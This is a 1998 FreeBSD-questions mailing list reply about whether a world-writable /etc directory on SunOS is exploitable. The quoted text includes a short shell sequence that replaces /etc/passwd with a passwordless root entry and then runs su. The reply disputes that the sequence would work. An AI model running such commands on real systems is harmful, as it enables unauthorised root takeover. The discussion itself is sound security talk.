From owner-freebsd-questions  Fri Dec 18 01:59:11 1998
Return-Path: <owner-freebsd-questions@FreeBSD.ORG>
Received: (from majordom@localhost)
          by hub.freebsd.org (8.8.8/8.8.8) id BAA18568
          for freebsd-questions-outgoing; Fri, 18 Dec 1998 01:59:11 -0800 (PST)
          (envelope-from owner-freebsd-questions@FreeBSD.ORG)
Received: from ingate.uk.neceur.com (ingate.uk.neceur.com [193.116.254.1])
          by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA18563
          for <questions@FreeBSD.org>; Fri, 18 Dec 1998 01:59:10 -0800 (PST)
          (envelope-from Jeff.Bond@nectech.co.uk)
Received: from internal-mail.uk.neceur.com by ingate.uk.neceur.com
        id JAA29211; Fri, 18 Dec 1998 09:57:56 GMT
Received: from exchange.nectech.co.uk by internal-mail.uk.neceur.com
        id JAA25692; Fri, 18 Dec 1998 09:57:55 GMT
    from exchange.nectech.co.uk (exchange.nectech.co.uk [193.116.199.241])
    id JAA25692 (2.4-8.8.8/3.1.31);
    Fri, 18 Dec 1998 09:57:55 GMT
Received: by exchange.nectech.co.uk with Internet Mail Service (5.0.1460.8)
	id <Y0BML1Y5>; Fri, 18 Dec 1998 09:54:56 -0000
Message-ID: <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk>
From: "Bond, Jeffery" <Jeff.Bond@nectech.co.uk>
To: "'FreeBSD questions'" <questions@FreeBSD.ORG>
Cc: "'cjc@cc942873-a.ewndsr1.nj.home.com'"
	 <cjc@cc942873-a.ewndsr1.nj.home.com>
Subject: RE: Basic Security Question
Date: Fri, 18 Dec 1998 09:54:54 -0000
X-Mailer: Internet Mail Service (5.0.1460.8)
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

>Mark Ovens wrote,
>
>> and on all the Sparcs running SunOS4.1.3_U1 here are:
>> 
>> gppsun4:/{8}% ls -ldug etc
>> drwxrwsrwx 10 bin      staff        2048 Dec 17 09:30 etc
>> 
>> which is even less secure as it's writable by all!
>
>I may be dense. Is that some kind of joke or something? As dense as I
>am, I know for sure that even I could take any account on a system
>with permissions like that and have control of root in this many
>keystrokes:
>
>% cd /etc
>% echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
>% mv passwd passwd.old
>% mv passwd.new passwd
>% su
>#

Just because the directory is writable, this doesnt mean the existing files
in it are too. You won't be able to do 'mv passwd passwd.old'. 

Jeff


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message